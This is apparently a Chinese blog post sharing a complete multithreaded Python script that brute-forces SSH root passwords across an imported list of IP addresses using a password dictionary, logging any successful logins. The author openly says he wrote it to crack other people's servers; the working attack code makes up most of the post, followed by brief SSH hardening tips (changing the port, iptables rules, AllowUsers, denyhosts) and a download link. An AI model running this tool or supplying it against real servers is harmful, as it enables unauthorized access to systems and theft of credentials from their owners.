python多线程ssh爆破
- 发表于
- Crack
0x01.About
这几天发现朋友的服务器22被人爆了,于是想想,也想去爆别人服务器。
爆弱口令时候写的一个python小脚本,主要功能是实现使用字典多线程爆破ssh,支持ip表导入,字典数据导入。
主要使用到的是python的paramiko模块和多线程threading模块。
那么,首先要准备的是字典dict、服务器ip表。
东西很简单,主要默认目录如下:
1 2 3 4 5 6 |
|--ssh.scan.py |--/log: sshd |--/dict: ip password |
ip和password按照一行一个放置。
0x02.Code
下面上源码吧,文件保存为ssh.scan.py
,查看使用方式:python ssh.scan.py -h
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 |
#!/usr/bin/python python # -*- coding: utf-8 -*- import paramiko,threading,sys,time,os class SSHThread(threading.Thread): def __init__(self, ip, port, timeout, dic, LogFile): threading.Thread.__init__(self) self.ip = ip self.port = port self.dict = dic self.timeout = timeout self.LogFile = LogFile def run(self): print("Start try ssh => %s" % self.ip) username = "root" try: password = open(self.dict).read().split('\n') except: print("Open dict file `%s` error" % self.dict) exit(1) for pwd in password: try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(self.ip, self.port, username, pwd, timeout = self.timeout) print("\nIP => %s, Login %s => %s \n" % (self.ip, username, pwd)) open(self.LogFile, "a").write("[ %s ] IP => %s, port => %d, %s => %s \n" % (time.asctime( time.localtime(time.time()) ), self.ip, self.port, username, pwd)) break except: print("IP => %s, Error %s => %s" % (self.ip, username, pwd)) pass def ViolenceSSH(ip, port, timeout, dic, LogFile): ssh_scan = SSHThread(ip, port, timeout, dic, LogFile) ssh_scan.start() def main(ipFile, dic, log): if ipFile == "-h": help() try: ipText = open(ipFile).read().split('\n') for ip in ipText: if ip != '': time.sleep(0.5) threading.Thread(target = ViolenceSSH, args = (ip, 22, 1, dic, log, )).start() except: print("Open IP list file `%s` error" % ipFile) exit(1) def help(): print("python ssh.scan.py 使用说明:\n\ python ssh.scan.py ip_file_path dict_file_path ssh_log_path \n") exit(1) if __name__ == '__main__': fpath = os.path.dirname(os.path.abspath('__file__')) ipFile = sys.argv[1] if len(sys.argv) > 1 else fpath+"/dict/ip" dic = sys.argv[2] if len(sys.argv) > 2 else fpath+"/dict/password" log = sys.argv[3] if len(sys.argv) > 3 else fpath+"/log/sshd" try: os.system("clear") main(ipFile, dic, log) except KeyboardInterrupt: exit(1) |
结果比较丑,自己爆自己服务器:
0x03.Solution
怎么办呢?防止被人爆菊,那就修改ssh默认登陆端口吧。修改方式主要是修改ssh配置文件:
1.修改iptables
首先要过防火墙,修改防火墙规则:
/sbin/iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 2333 -j ACCEPT
保存规则:
service iptables save
重启防火墙:
service iptables restart
2.修改ssh配置文件
cp /etc/ssh/ssh_config /etc/ssh/ssh_config.bak
cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
修改ssh端口:
vim /etc/ssh/sshd_config
在端口#Port 22下面增加Port 2333
vim /etc/ssh/ssh_config
在端口#Port 22下面增加Port 2333
重启ssh服务:
service sshd restart
3.其他修改
限制用户的SSH访问
假设我们只要xiaocao和homeway用户能通过SSH使用系统,向sshd_config配置文件中添加
vim /etc/ssh/sshd_config
修改下面一行:
AllowUsers xiaocao homeway
另外建议直接安装denyhosts
打包下载
https://pan.baidu.com/s/1kUOnFZh,密码:yhna
相关参考
http://homeway.me/2015/06/20/python-violence-ssh-attack/
http://www.cnblogs.com/cbreeze/p/5843043.html
http://www.backlion.org/archives/3476
原文连接
的情况下转载,若非则不得使用我方内容。